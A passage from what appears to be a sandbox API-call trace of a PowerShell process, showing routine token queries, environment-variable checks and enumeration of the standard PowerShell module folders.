pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.896] CoTaskMemFree (pv=0x25b73cfc3a0) [0282.896] GetCurrentProcess () returned 0xffffffffffffffff [0282.896] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xb3c) returned 1 [0282.896] GetTokenInformation (in: TokenHandle=0xb3c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.896] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739842b0 [0282.896] GetTokenInformation (in: TokenHandle=0xb3c, TokenInformationClass=0x1, TokenInformation=0x25b739842b0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739842b0, ReturnLength=0x653ef8d6b8) returned 1 [0282.897] LocalFree (hMem=0x25b739842b0) returned 0x0 [0282.897] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c129a60, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c129a60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.897] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x9f8, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.897] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe7c0 [0282.897] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfe7c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.897] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.901] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d02120 [0282.901] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d02120, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.901] CoTaskMemFree (pv=0x25b73d02120) [0282.901] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cff480 [0282.901] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cff480 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.901] CoTaskMemFree (pv=0x25b73cff480) [0282.901] GetCurrentProcess () returned 0xffffffffffffffff [0282.901] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xb40) returned 1 [0282.902] GetTokenInformation (in: TokenHandle=0xb40, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.902] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739848f0 [0282.902] GetTokenInformation (in: TokenHandle=0xb40, TokenInformationClass=0x1, TokenInformation=0x25b739848f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739848f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.902] LocalFree (hMem=0x25b739848f0) returned 0x0 [0282.902] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c130350, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c130350*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.903] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xb44, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.903] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe7c0 [0282.903] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfe7c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.903] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.906] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfdf40 [0282.906] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfdf40, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.906] CoTaskMemFree (pv=0x25b73cfdf40) [0282.906] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d02120 [0282.906] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d02120 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.906] CoTaskMemFree (pv=0x25b73d02120) [0282.907] GetCurrentProcess () returned 0xffffffffffffffff [0282.907] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xb48) returned 1 [0282.907] GetTokenInformation (in: TokenHandle=0xb48, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.907] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984570 [0282.907] GetTokenInformation (in: TokenHandle=0xb48, TokenInformationClass=0x1, TokenInformation=0x25b73984570, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984570, ReturnLength=0x653ef8d6b8) returned 1 [0282.908] LocalFree (hMem=0x25b73984570) returned 0x0 [0282.908] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c137760, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c137760*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.908] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xb4c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.908] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0282.908] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.908] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.943] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfee20 [0282.943] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfee20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.944] CoTaskMemFree (pv=0x25b73cfee20) [0282.944] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfb4c0 [0282.944] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfb4c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.944] CoTaskMemFree (pv=0x25b73cfb4c0) [0282.944] GetCurrentProcess () returned 0xffffffffffffffff [0282.944] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xb50) returned 1 [0282.944] GetTokenInformation (in: TokenHandle=0xb50, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.944] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984ab0 [0282.944] GetTokenInformation (in: TokenHandle=0xb50, TokenInformationClass=0x1, TokenInformation=0x25b73984ab0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984ab0, ReturnLength=0x653ef8d6b8) returned 1 [0282.945] LocalFree (hMem=0x25b73984ab0) returned 0x0 [0282.945] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c13f2c8, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c13f2c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.945] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa5c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.945] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa800 [0282.945] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfa800, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.945] CoTaskMemFree (pv=0x25b73cfa800) [0282.945] ReleaseMutex (hMutex=0xa5c) returned 1 [0282.945] CoCreateGuid (in: pguid=0x653ef8d6c8 | out: pguid=0x653ef8d6c8*(Data1=0xc22f598e, Data2=0xa201, Data3=0x44b8, Data4=([0]=0xbc, [1]=0xaf, [2]=0x84, [3]=0x7e, [4]=0x25, [5]=0x50, [6]=0xc5, [7]=0xef))) returned 0x0 [0282.946] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa08 [0282.946] SetThreadUILanguage (LangId=0x0) returned 0x409 [0282.946] EtwEventActivityIdControl () returned 0x0 [0282.946] EtwEventActivityIdControl () returned 0x0 [0282.947] EtwEventActivityIdControl () returned 0x0 [0282.960] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0282.960] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0282.960] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.960] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0282.960] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0282.960] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0282.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0282.963] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0282.978] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0282.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0282.978] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0282.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0282.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0282.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0282.979] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0282.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0282.979] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0282.979] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0282.979] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.979] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0282.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0282.979] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0282.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0282.982] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0282.997] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0282.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0282.997] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0282.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0282.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0282.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0282.998] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0282.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0282.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0282.998] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0282.998] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x653ef8c8f0 | out: lpFindFileData=0x653ef8c8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0282.998] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0282.999] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0282.999] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0282.999] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0282.999] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0283.000] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0283.000] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0283.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0283.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0283.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0283.000] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0283.000] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x653ef8c8f0 | out: lpFindFileData=0x653ef8c8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0283.001] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.002] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0283.002] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0283.002] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0283.003] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0283.003] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 0 [0283.003] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0283.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0283.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0283.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0283.004] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0283.004] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), 